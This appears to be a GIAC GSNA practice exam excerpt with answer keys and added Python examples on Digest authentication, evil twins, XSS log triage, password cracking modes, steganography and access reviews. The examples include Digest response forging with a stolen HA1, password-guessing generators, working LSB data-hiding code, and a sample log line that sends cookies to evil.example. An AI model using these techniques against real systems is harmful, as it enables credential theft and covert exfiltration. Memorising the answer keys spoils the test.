GIAC Information Security GSNA Questions & Answers
Question 31:
Which of the following statements is true about the Digest Authentication scheme?
A. A valid response from the client contains a checksum of the username, the password, the given random value, the HTTP method, and the requested URL.
B. In this authentication scheme, the username and password are passed with every request, not just when the user first types them.
C. The password is sent over the network in clear text format.
D. It uses the base64 encoding encryption scheme.
Correct Answer: A
The Digest Authentication scheme (RFC 2617) was designed as a replacement for the Basic Authentication scheme and follows a challenge-response model. The password itself is never sent across the network; what travels is a hash (MD5 by default) computed over the password together with other values, so a sniffer cannot read the password directly. How does it work? The server's WWW-Authenticate header may name the algorithm used to create the checksum or digest (MD5 unless otherwise specified) and carries the challenge: a nonce, a server-chosen data string that should be uniquely generated each time a 401 response is sent. A valid client response contains a checksum (the MD5 checksum by default) computed over the username, the realm, the password, the nonce, the HTTP method, and the requested URI, so the password never appears in clear text. Drawback: the server does not need the clear-text password to verify a response, only the digest of username:realm:password (called HA1). An attacker who obtains that stored digest can answer any challenge without ever learning the password, and an attacker who captures one exchange can test candidate passwords offline against it, which is practical for short or common passwords. Answer: B, C, and D are incorrect. Those statements describe the Basic Authentication scheme, in which the username and password are sent with every request as a Base64-encoded string, which is an encoding rather than encryption.
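The computation described above, written out as an added example (this code is not part of the original exam explanation). It follows RFC 2617 with MD5 and uses the RFC's own worked values (user Mufasa, realm testrealm@host.com, password "Circle Of Life", the RFC's nonce and cnonce); the server-side credential store, the stolen-HA1 forgery and the attacker's candidate list are constructed for the example.

```python
import hashlib
import secrets
from typing import Optional


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    # The only value the server needs to keep; it stands in for the password.
    return md5_hex(f"{username}:{realm}:{password}")


def digest_response(ha1_hex: str, method: str, uri: str, nonce: str,
                    qop: Optional[str] = None, nc: str = "", cnonce: str = "") -> str:
    """RFC 2617 'response' value, computed from HA1 rather than the password so that the
    client (which derives HA1 from the password) and the server (which stores HA1) run
    exactly the same code."""
    ha2 = md5_hex(f"{method}:{uri}")
    if qop is None:  # RFC 2069 compatible form: no client nonce, no nonce count
        return md5_hex(f"{ha1_hex}:{nonce}:{ha2}")
    return md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


# Values from the RFC 2617 section 3.5 example (real RFC values, not constructed).
REALM = "testrealm@host.com"
EXAMPLE = dict(username="Mufasa", method="GET", uri="/dir/index.html",
               nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
               qop="auth", nc="00000001", cnonce="0a4f113b")


def rfc2617_example_response() -> str:
    return digest_response(ha1("Mufasa", REALM, "Circle Of Life"),
                           EXAMPLE["method"], EXAMPLE["uri"], EXAMPLE["nonce"],
                           EXAMPLE["qop"], EXAMPLE["nc"], EXAMPLE["cnonce"])


# Constructed server-side credential store: HA1 per user, no clear-text passwords.
PASSWORD_FILE = {"Mufasa": ha1("Mufasa", REALM, "Circle Of Life")}


def server_verify(username: str, method: str, uri: str, nonce: str, response: str,
                  qop: Optional[str] = None, nc: str = "", cnonce: str = "") -> bool:
    stored = PASSWORD_FILE.get(username)
    if stored is None:
        return False
    expected = digest_response(stored, method, uri, nonce, qop, nc, cnonce)
    return secrets.compare_digest(expected, response)  # constant-time comparison


def forge_with_stolen_ha1(stolen_ha1: str, method: str, uri: str, nonce: str, **kw) -> str:
    # The drawback from the text: whoever holds HA1 can answer any challenge
    # without ever knowing the password.
    return digest_response(stolen_ha1, method, uri, nonce, **kw)


def offline_guess(captured: dict, candidates) -> Optional[str]:
    # A sniffer sees username, nonce, uri, method, nc, cnonce and the response;
    # every candidate password can be tested locally against that single capture.
    for pw in candidates:
        guess = digest_response(ha1(captured["username"], REALM, pw), captured["method"],
                                captured["uri"], captured["nonce"], captured["qop"],
                                captured["nc"], captured["cnonce"])
        if guess == captured["response"]:
            return pw
    return None
```

The practical consequences for an auditor: the HA1 store must be protected like a password file, nonces must be single-use (the server should track the nc counter) to stop replay, and Digest only hides the password from a passive sniffer; it does not protect the request body or defeat an active attacker, so it belongs behind TLS.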
Question 32:
You have detected what appears to be an unauthorized wireless access point on your network. However, this access point has the same MAC address as one of your real access points and is broadcasting with a stronger signal.
What is this called?
A. Bluesnarfing
B. The evil twin attack
C. WAP cloning
D. DoS
Correct Answer: B
In the evil twin attack, a rogue wireless access point is set up to impersonate one of your legitimate access points, here by cloning its MAC address (BSSID), and usually its SSID as well, and broadcasting at a stronger signal so that clients prefer it. The rogue AP will often also launch a denial of service attack against the legitimate access point (for example, a flood of deauthentication frames) so that it cannot respond to users, who are then steered onto the 'evil twin'. Answer: A is incorrect. Bluesnarfing is the unauthorized retrieval of data such as contacts and messages from a Bluetooth-enabled device; it has nothing to do with Wi-Fi access points. Answer: D is incorrect. A DoS may be used as part of establishing an evil twin, but the attack itself is not specifically a denial of service. Answer: C is incorrect. While the attacker must clone the legitimate AP's MAC address, the attack is not called WAP cloning.
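The detection side of the scenario above, as an added example (not part of the original exam explanation): given beacon observations of the kind a wireless sensor records, flag a BSSID that matches a legitimate AP but appears on a channel it was not deployed on or with a wildly inconsistent signal strength, and flag any unknown BSSID advertising a corporate SSID. The AP inventory and the observations are constructed for the example.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed inventory of legitimate access points: BSSID -> (SSID, channel).
AUTHORIZED_APS: Dict[str, Tuple[str, int]] = {
    "00:11:22:33:44:55": ("CorpWiFi", 6),
    "00:11:22:33:44:56": ("CorpWiFi", 11),
}

# Constructed beacon observations from one sensor: (bssid, ssid, channel, rssi_dbm).
OBSERVATIONS = [
    ("00:11:22:33:44:55", "CorpWiFi", 6, -67),
    ("00:11:22:33:44:55", "CorpWiFi", 6, -66),
    ("00:11:22:33:44:56", "CorpWiFi", 11, -71),
    ("00:11:22:33:44:55", "CorpWiFi", 1, -38),   # cloned BSSID on another channel, far stronger
    ("aa:bb:cc:dd:ee:ff", "CorpWiFi", 1, -45),   # unknown BSSID advertising the corporate SSID
    ("66:77:88:99:aa:bb", "GuestCafe", 1, -70),  # unrelated neighbour, not our SSID
]


def find_evil_twins(observations, authorized, rssi_gap_db: int = 20) -> List[Tuple[str, str]]:
    """Return sorted (alert_kind, bssid) pairs. A legitimate AP seen from one fixed sensor
    should sit on one channel with a fairly stable RSSI; a twin breaks one or both."""
    corp_ssids = {ssid for ssid, _ in authorized.values()}
    by_bssid = defaultdict(list)
    for bssid, ssid, channel, rssi in observations:
        by_bssid[bssid].append((ssid, channel, rssi))

    alerts = []
    for bssid, seen in by_bssid.items():
        ssids = {s for s, _, _ in seen}
        if bssid not in authorized:
            if ssids & corp_ssids:
                alerts.append(("unauthorized_bssid_with_corporate_ssid", bssid))
            continue
        auth_ssid, auth_channel = authorized[bssid]
        channels = {c for _, c, _ in seen}
        if channels - {auth_channel}:
            alerts.append(("cloned_bssid_on_unexpected_channel", bssid))
        rssis = [r for _, _, r in seen]
        if max(rssis) - min(rssis) >= rssi_gap_db:
            alerts.append(("cloned_bssid_signal_inconsistent", bssid))
        if ssids - {auth_ssid}:
            alerts.append(("cloned_bssid_ssid_mismatch", bssid))
    return sorted(alerts)
```

The RSSI gap threshold is a tuning knob: a single fixed sensor will see normal variation of a few dB, so the gap should be set well above that, and a twin on the same channel as the original still trips the signal check even though the channel check stays quiet.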
Question 33:
You work as a Computer Hacking Forensic Investigator for SecureNet Inc. You want to investigate a Cross-Site Scripting attack on your company's Web site. Which of the following methods of investigation can you use to accomplish the task?
A. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site.
B. Look at the Web server logs and normal traffic logging.
C. Use Wireshark to capture traffic going to the server and then search for requests going to the input page, which may give a log of the malicious traffic and the IP address of the source.
D. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers.
Correct Answer: ABD
You can use the following methods to investigate a Cross-Site Scripting attack:
1. Look at the Web server logs and normal traffic logging.
2. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers.
3. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site.
Answer: C is incorrect. Capturing traffic with Wireshark is not one of the methods listed for investigating a Cross-Site Scripting attack; a capture only helps if it was already running when the attack occurred, whereas the server logs and proxy records are retained as a matter of course.
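Method 1 above in practice, as an added example (not part of the original exam explanation): URL-decode the request line of each Web server log entry and match it against a small set of XSS indicators, then count hits per source address. The log lines are constructed in the common "combined" format with typical reflected-XSS probes; the indicator list is a starting point, not a complete signature set.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Constructed Apache/nginx "combined" access log lines. The payloads are ordinary
# reflected-XSS probes, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=widgets HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /profile?name=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E HTTP/1.1" 200 4870 "-" "curl/8.0"
198.51.100.4 - - [10/Oct/2023:13:56:05 +0000] "GET /redirect?url=javascript:fetch('//evil.example/'%2Bdocument.cookie) HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "POST /comment HTTP/1.1" 200 120 "https://www.example.com/blog" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are applied after URL decoding; each pattern names what it catches.
XSS_INDICATORS = {
    "script_tag":    re.compile(r"<\s*/?\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "js_uri":        re.compile(r"javascript\s*:", re.I),
    "tag_breakout":  re.compile(r"[\"']\s*>\s*<", re.I),
}


def decode_fully(s: str, rounds: int = 3) -> str:
    # Attackers double-encode to slip past naive filters: decode until stable (bounded).
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def triage_xss(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (client_ip, raw_path, [indicator names]) for every request whose decoded
    request path matches at least one XSS indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real triage would log the parse failure
        decoded = decode_fully(m["path"])
        names = [name for name, rx in XSS_INDICATORS.items() if rx.search(decoded)]
        if names:
            hits.append((m["ip"], m["path"], names))
    return hits


def suspects_by_ip(hits) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts
```

Two caveats the log alone cannot settle: a POST body (line 5) is not logged by default, so stored-XSS payloads submitted through forms need the proxy or application logging named in method 2, and a hit in the log shows an attempt, not whether the application actually reflected the payload.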
Question 34:
Many organizations create network maps of their network systems to visualize the network and understand the relationships between end devices and the transport layers that provide services. Which of the following are techniques used for network mapping by large organizations?
Each correct answer represents a complete solution. Choose three.
A. Route analytics
B. Active Probing
C. SNMP-based approaches
D. Packet crafting
Correct Answer: ABC
Many organizations create network maps of their network systems. These maps can be made manually using simple tools such as Microsoft Visio, or the mapping process can be simplified by using tools that integrate automatic network discovery with network mapping. Many of the vendors in the notable network mappers list let a user do the following:
Customize the maps
Include one's own labels
Add undiscoverable items
Add background images
Sophisticated mapping is used to help visualize the network and understand the relationships between end devices and the transport layers that provide service. Items such as bottlenecks and root causes can be easier to spot using these tools. There are three main techniques used for network mapping: SNMP-based approaches, active probing, and route analytics. The SNMP-based approach retrieves data from router and switch MIBs in order to build the network map. The active probing approach relies on a series of traceroute-like probe packets in order to build the network map. The route analytics approach relies on information from the routing protocols to build the network map. Each of the three approaches has advantages and disadvantages in the methods it uses.
Answer: D is incorrect. Packet crafting is a technique for probing firewall rule sets and finding entry points into a targeted system or network, not for mapping it. It is done with a packet generator, software that generates random packets or lets the user construct detailed custom packets, typically using raw sockets. This is useful for testing implementations of IP stacks for bugs and security vulnerabilities.
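The active probing technique above, as an added example (not part of the original exam explanation): hop sequences of the kind traceroute returns for several destinations are merged into one adjacency map, keeping a placeholder for hops that did not answer so the path is not falsely collapsed, and the nodes that carry traffic for the most destinations are counted as bottleneck candidates. The traces are constructed; a real mapper would obtain them by sending the probe packets.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed traceroute-style results: destination -> ordered responding hops,
# None where a hop did not answer (ICMP filtered or rate limited).
TRACES: Dict[str, List[Optional[str]]] = {
    "10.1.1.10": ["10.0.0.1", "10.0.1.1", "10.1.1.10"],
    "10.1.2.20": ["10.0.0.1", "10.0.1.1", "10.1.2.20"],
    "10.2.1.30": ["10.0.0.1", "10.0.2.1", None, "10.2.1.30"],
    "10.3.1.40": ["10.0.0.1", "10.0.2.1", "10.3.0.1", "10.3.1.40"],
}


def build_topology(traces: Dict[str, List[Optional[str]]]) -> Dict[str, Set[str]]:
    """Merge hop sequences into an undirected adjacency map. An unresponsive hop becomes a
    unique placeholder node ('?-<destination>-<index>') so that two hops that only look
    adjacent because of a silent router in between are not joined directly."""
    adj: Dict[str, Set[str]] = defaultdict(set)
    for dst, hops in traces.items():
        named = [h if h is not None else f"?-{dst}-{i}" for i, h in enumerate(hops)]
        for a, b in zip(named, named[1:]):
            adj[a].add(b)
            adj[b].add(a)
    return adj


def transit_counts(traces: Dict[str, List[Optional[str]]]) -> Dict[str, int]:
    """How many destinations each intermediate node carries traffic for. Nodes with a
    high count are the shared dependencies to look at first in bottleneck or root
    cause analysis."""
    counts: Dict[str, int] = defaultdict(int)
    for dst, hops in traces.items():
        for hop in hops:
            if hop is not None and hop != dst:
                counts[hop] += 1
    return dict(counts)
```

The placeholder handling is the detail that matters in practice: probing maps only the forward path as seen from the probing host, and a router that drops ICMP shows up as a gap, so the SNMP-based or route analytics approaches are used alongside probing to fill in what the probes cannot see.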
Question 35:
You have been assigned a project to develop a Web site for a construction company. You plan to develop a Web site and want to get more control over the appearance and presentation of the Web pages. You also want to increase your ability to precisely specify the position and appearance of the elements on a page and create special effects. You plan to use cascading style sheets (CSS). You want to define styles only for the active page.
Which type of style sheet will you use?
A. Embedded Style Sheet
B. Inline Style Sheet
C. Internal Style Sheet
D. External Style Sheet
Correct Answer: A
To define styles only for the active page, you should use an embedded style sheet. Cascading style sheets (CSS) are used so that Web site authors can exercise greater control over the appearance and presentation of their Web pages; they also increase the ability to precisely specify the position and appearance of elements on a Web page and help in creating special effects. Cascading style sheets consist of rules that are interpreted and applied by the browser to the Web pages and their elements. There are three types of cascading style sheets:
External style sheets
Embedded style sheets
Inline style sheets
External style sheets are used whenever consistency in style is required throughout a Web site. A typical external style sheet uses a .css file extension and can be edited using a text editor such as Notepad. Embedded style sheets are used for defining styles for the active page only. Inline style sheets are used for defining the styles of individual elements of a page. Reference: TechNet, Contents: Microsoft Knowledge Base, February 2000 issue, PSS ID Number: Q179628
Question 36:
Brutus is a password cracking tool that can be used to crack the following authentication types:
HTTP (Basic Authentication)
HTTP (HTML Form/CGI)
POP3 (Post Office Protocol v3)
FTP (File Transfer Protocol)
SMB (Server Message Block)
Telnet
Which of the following attacks can be performed by Brutus for password cracking?
A. Man-in-the-middle attack
B. Hybrid attack
C. Replay attack
D. Brute force attack
E. Dictionary attack
Correct Answer: BDE
Brutus can be used to perform brute force attacks (trying every combination from a character set), dictionary attacks (trying each word from a word list), and hybrid attacks (dictionary words with mangling rules applied, such as capitalization or appended digits). Answer: A and C are incorrect. Man-in-the-middle and replay attacks intercept or reuse a legitimate session rather than guessing credentials, and they are not password cracking modes of Brutus.
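The three guessing modes above side by side, as an added example (not Brutus's own code and not part of the original exam explanation). Each mode is a candidate generator; the check against a SHA-256 hash of a constructed password stands in for the network login attempt Brutus makes per guess, and the tiny word list is constructed, so the attempt counts show the relative cost of the modes rather than realistic numbers.

```python
import hashlib
import itertools
import secrets
from typing import Iterable, Optional, Tuple

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
WORDLIST = ["password", "summer", "letmein", "qwerty"]  # constructed, deliberately tiny


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode("utf-8")).hexdigest()


def dictionary(words: Iterable[str]) -> Iterable[str]:
    # Plain dictionary attack: each word exactly as listed.
    yield from words


def hybrid(words: Iterable[str], max_suffix: int = 100) -> Iterable[str]:
    # Hybrid attack: dictionary words plus simple mangling rules
    # (capitalization, appended digits). Far cheaper than brute force, far
    # broader than the raw list.
    for w in words:
        yield w
        yield w.capitalize()
        for n in range(max_suffix):
            yield f"{w}{n}"
            yield f"{w.capitalize()}{n}"


def brute_force(charset: str = CHARSET, max_len: int = 3) -> Iterable[str]:
    # Exhaustive search, shortest candidates first. Cost grows as len(charset)**length,
    # which is why it is kept to a few characters here.
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def crack(target_hash: str, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Return (recovered_password_or_None, number_of_guesses). With Brutus each guess is
    a real login attempt against the service, so the count is also the number of failed
    logins a defender would see in the target's logs."""
    attempts = 0
    for pw in candidates:
        attempts += 1
        if secrets.compare_digest(sha256_hex(pw), target_hash):
            return pw, attempts
    return None, attempts
```

The attempt counts are what a defender can act on: a dictionary or hybrid run produces hundreds to thousands of failed logins from one source in quick succession, so account lockout and rate limiting on the services listed in the question defeat all three modes regardless of password strength.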
Question 37:
John used to work as a Network Administrator for We-are-secure Inc. He has now resigned from the company for personal reasons and wants to send out some secret information of the company. To do so, he takes an image file of the famous actress Jennifer Lopez, uses a tool such as ImageHide to embed the secret file within it, and sends it to his Yahoo mail ID. Since the data is hidden inside the image file, the company's mail server is unable to filter this mail.
Which of the following techniques is he performing to accomplish his task?
A. Web ripping
B. Steganography
C. Email spoofing
D. Social engineering
Correct Answer: B
According to the scenario, John is using steganography to exfiltrate the data. Steganography is the art and science of hiding information by embedding a message within another, seemingly harmless carrier. It works by replacing bits of redundant or unused data in regular computer files, such as graphics, sound, text, and HTML, with bits of the hidden information, so the carrier looks unchanged to a casual viewer. The hidden information can be plain text, cipher text, or even another image. Answer: A is incorrect. Web ripping is a technique in which the attacker copies the whole structure of a Web site to the local disk and obtains all the files of the Web site; it helps an attacker look for loopholes in the site offline. Answer: D is incorrect. Social engineering is the art of convincing people to disclose useful information such as account names and passwords, which attackers then exploit to gain access to a user's computer or network. It relies on manipulating people rather than on technical skill. A user should always distrust people who ask for an account name or password, computer name, IP address, employee ID, or other information that can be misused. Answer: C is incorrect. John is not performing email spoofing. In email spoofing, an attacker sends email with another person's address written in the From field of the message.
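The bit-replacement mechanism described above, as an added example (not ImageHide's code and not part of the original exam explanation): the secret is written into the least significant bit of each byte of a carrier, with a length prefix so the extractor knows where the payload ends. The carrier here is a constructed 64x64 8-bit greyscale gradient standing in for the raw pixel samples an image library would return; no image library is needed to run it.

```python
from typing import Iterable


def _bits(data: bytes) -> Iterable[int]:
    # Most significant bit first, one bit per carrier byte.
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed_lsb(carrier: bytes, secret: bytes) -> bytes:
    """Hide `secret` in the least significant bit of each carrier byte (e.g. 8-bit pixel
    samples). A 4-byte big-endian length prefix marks where the payload ends. Every carrier
    byte changes by at most 1, which the eye cannot see in image data."""
    payload = len(secret).to_bytes(4, "big") + secret
    if len(payload) * 8 > len(carrier):
        raise ValueError(f"carrier too small: need {len(payload) * 8} bytes")
    out = bytearray(carrier)
    for i, bit in enumerate(_bits(payload)):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    """Inverse of embed_lsb: read the length prefix, then exactly that many bytes."""
    def read_bytes(offset_bits: int, count: int) -> bytes:
        result = bytearray()
        for b in range(count):
            value = 0
            for k in range(8):
                value = (value << 1) | (stego[offset_bits + b * 8 + k] & 1)
            result.append(value)
        return bytes(result)

    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def max_byte_change(a: bytes, b: bytes) -> int:
    # How far any carrier byte moved; LSB embedding guarantees at most 1.
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed carrier: 4096 samples of a smooth gradient, so capacity is 512 payload bytes.
CARRIER = bytes((x * 4 + y) & 0xFF for y in range(64) for x in range(64))
```

This is also why the mail filter in the scenario saw nothing: content inspection of the attachment finds a valid image whose pixel values differ from an innocent one by at most one level. Detection has to be statistical (LSB embedding disturbs the pixel value histogram in ways a chi-square test picks up) or policy-based, for example blocking image attachments to personal webmail from accounts with access to sensitive data.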
Question 38:
Which of the following backup sites takes the longest recovery time?
A. Mobile backup site
B. Warm site
C. Cold site
D. Hot site
Correct Answer: C
A cold backup site takes the longest recovery time. It is the least expensive type of backup site for an organization to operate. It does not include backed-up copies of data and information from the organization's original location, nor does it include hardware already set up. The lack of hardware keeps the startup cost of the cold site minimal, but it requires additional time after a disaster to get operations running at a capacity close to the pre-disaster level. Answer: D is incorrect. A hot site is a duplicate of the organization's original site, with full computer systems as well as near-complete backups of user data. Real-time synchronization between the two sites may be used to completely mirror the data environment of the original site using wide area network links and specialized software. Ideally, a hot site will be up and running within a matter of hours or even less. Answer: A is incorrect. A mobile backup site is a self-contained unit that can be delivered to where it is needed and connected; it provides relatively rapid recovery once in place, though the transport and setup mean it is not a full, immediate recovery. Of the four, the hot site has the shortest recovery time and the cold site the longest. Answer: B is incorrect. A warm site is, quite logically, a compromise between hot and cold. These sites will have hardware and connectivity already established, though on a smaller scale than the original production site or even a hot site. Warm sites will have backups on hand, but they may not be complete and may be between several days and a week old. An example would be backup tapes sent to the warm site by courier.
Question 39:
You work as a Security Manager for Qualoxizz Inc. Your company has a number of network switches in the site network infrastructure. Which of the following actions will you perform to ensure the security of the switches in your company?
A. Open up all the unused management ports.
B. Set similar passwords for each management port.
C. Set long session timeouts.
D. Ignore usage of the default account settings.
Correct Answer: D
A switch whose management interface still accepts a default user account lets an attacker log in by trying one or more of the well-known default accounts (for example administrator, root, or security), so the default account settings should never be left in use. Answer: A is incorrect. Unused management ports on a switch should be disabled, not opened, so that they cannot be found by port scanning and used as an entry point. Answer: B is incorrect. Setting the same password on all management ports increases exposure to password cracking: once the password of one port is known, the attacker can use it to break into all of them. Answer: C is incorrect. Short session timeouts should be set to limit the session period. If connections to a management port have no timeout or a long one (greater than 9 minutes), idle sessions remain available for an attacker to hijack.
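The four checks above turned into a configuration audit, as an added example (not part of the original exam explanation). The configuration excerpts are constructed and written in Cisco IOS style, which is an assumption (the question names no vendor); the weak excerpt contains one instance of each weakness in the question and the hardened excerpt none. The 9-minute limit comes from the explanation above; the list of default account names is the example's own.

```python
from collections import defaultdict
from typing import List, Tuple

# Constructed running-config excerpt (Cisco IOS-style syntax is an assumption).
WEAK_CONFIG = """\
hostname access-sw-01
username admin privilege 15 secret 5 $1$abcd$000000000000000000000
username netops privilege 15 secret 5 $1$efgh$111111111111111111111
!
interface GigabitEthernet0/10
 description UNUSED
!
interface GigabitEthernet0/11
 description UNUSED
 shutdown
!
line con 0
 password Cisco123
 login
 exec-timeout 30 0
line vty 0 4
 password Cisco123
 login
 exec-timeout 0 0
line vty 5 15
 password Cisco123
 login
"""

# Constructed hardened excerpt: no default account, unused port shut, unique per-user
# secrets instead of a shared line password, 5-minute timeouts on every line.
HARDENED_CONFIG = """\
hostname access-sw-01
username n3t0ps-a7 privilege 15 secret 5 $1$efgh$111111111111111111111
!
interface GigabitEthernet0/10
 description UNUSED
 shutdown
!
line con 0
 login local
 exec-timeout 5 0
line vty 0 15
 login local
 transport input ssh
 exec-timeout 5 0
"""

DEFAULT_ACCOUNTS = {"admin", "administrator", "cisco", "root", "security", "guest"}
MAX_TIMEOUT_MIN = 9  # the limit given in the exam explanation


def parse_blocks(config: str) -> List[Tuple[str, List[str]]]:
    """Split the config into (header line, [indented body lines]) blocks."""
    blocks, header, body = [], None, []
    for raw in config.splitlines():
        if raw.startswith(" "):
            body.append(raw.strip())
        elif raw.startswith("!") or not raw.strip():
            continue
        else:
            if header is not None:
                blocks.append((header, body))
            header, body = raw.strip(), []
    if header is not None:
        blocks.append((header, body))
    return blocks


def audit_switch_config(config: str) -> List[Tuple[str, str]]:
    """Return (finding_kind, where) for each of the four weaknesses in the question."""
    findings = []
    password_lines = defaultdict(list)
    for header, body in parse_blocks(config):
        words = header.split()
        if words[0] == "username" and words[1].lower() in DEFAULT_ACCOUNTS:
            findings.append(("default_account", words[1]))
        elif words[0] == "interface":
            desc = next((l for l in body if l.startswith("description")), "")
            if "unused" in desc.lower() and "shutdown" not in body:
                findings.append(("unused_port_enabled", words[1]))
        elif words[0] == "line":
            timeout = next((l for l in body if l.startswith("exec-timeout")), None)
            if timeout is None:
                findings.append(("no_exec_timeout", header))  # vendor default applies
            else:
                minutes = int(timeout.split()[1])
                if minutes == 0 or minutes > MAX_TIMEOUT_MIN:  # "0 0" means never
                    findings.append(("long_exec_timeout", header))
            pw = next((l.split(None, 1)[1] for l in body if l.startswith("password ")), None)
            if pw:
                password_lines[pw].append(header)
    for pw, where in password_lines.items():
        if len(where) > 1:
            findings.append(("shared_password", ", ".join(where)))
    return findings
```

Running the audit over a saved running-config is the repeatable version of the review the question describes; on a real estate the same parser would be pointed at every switch's configuration export so that a regression on one device is caught before an attacker finds it.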
Question 40:
You are the Network Admin for a company. You are concerned about users having access to items they should not. Your concern is that they may inadvertently have been granted access to those resources. When conducting a user access and rights review, which of the following is most likely to show you such unintentional granting of user rights?
A. IDS Logs
B. Access Control Lists
C. Server logs
D. Group Membership
Correct Answer: D
Most often, user rights are determined by the groups the user belongs to. In some cases a user may mistakenly be added to a group they should not be in. It is also common that a user moves within the organization but is retained in their previous group, keeping those rights. Answer: B is incorrect. Access Control Lists are usually set up manually, so a person is unlikely to be added to one inadvertently. You might want to check the ACLs, and you might find some issues, but this is not the most likely way to find users with inappropriate rights. Answer: C is incorrect. At best, server logs can show you whether a user accessed a resource; a user could have access to a resource and simply not have used it yet. Answer: A is incorrect. IDS logs will only help you identify potential attacks. Unless you suspect the user of intentionally trying to break into resources, an IDS log will not help in this scenario.
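The group membership review above in script form, as an added example (not part of the original exam explanation): each user's effective groups are resolved through nested group membership and compared against the groups that user's role is supposed to have, so both the "added by mistake" and the "moved but never removed" cases surface. The directory data, roles and baseline are constructed; in a real review the same logic runs over an export from the directory service.

```python
from typing import Dict, List, Set, Tuple

# Constructed directory data. Groups may contain other groups (nesting), which is
# how rights often arrive without anyone granting them to the user directly.
GROUP_MEMBERS: Dict[str, Set[str]] = {
    "Finance-Users":  {"alice", "bob"},
    "Finance-Admins": {"carol", "Finance-Users"},  # nested: every Finance-User is an admin too
    "HR-Users":       {"bob", "dave"},
    "IT-Helpdesk":    {"erin"},
}

# Baseline: the groups each role justifies. Anything beyond this needs an explanation.
ROLE_BASELINE: Dict[str, Set[str]] = {
    "finance-analyst": {"Finance-Users"},
    "finance-manager": {"Finance-Users", "Finance-Admins"},
    "hr-generalist":   {"HR-Users"},
    "helpdesk":        {"IT-Helpdesk"},
}

# bob moved from Finance to HR but was never removed from Finance-Users.
USER_ROLE = {"alice": "finance-analyst", "bob": "hr-generalist",
             "carol": "finance-manager", "dave": "hr-generalist", "erin": "helpdesk"}


def effective_groups(member: str, group_members: Dict[str, Set[str]],
                     _seen: Set[str] = None) -> Set[str]:
    """All groups `member` belongs to, directly or through nested groups.
    The `_seen` set doubles as cycle protection for group-in-group loops."""
    seen = set() if _seen is None else _seen
    for group, members in group_members.items():
        if member in members and group not in seen:
            seen.add(group)
            effective_groups(group, group_members, seen)
    return seen


def review_access(user_role: Dict[str, str], role_baseline: Dict[str, Set[str]],
                  group_members: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Return (user, group, how) for every effective membership the user's role does not
    justify; `how` tells the reviewer whether to fix the user or the group nesting."""
    findings = []
    for user, role in sorted(user_role.items()):
        allowed = role_baseline.get(role, set())
        for group in sorted(effective_groups(user, group_members)):
            if group not in allowed:
                direct = user in group_members.get(group, set())
                findings.append((user, group, "direct" if direct else "via nested group"))
    return findings
```

The nested case is the one a manual look at group membership misses: alice was never added to Finance-Admins, yet she effectively holds its rights because Finance-Users sits inside it, so the finding points at the group nesting rather than at alice's account.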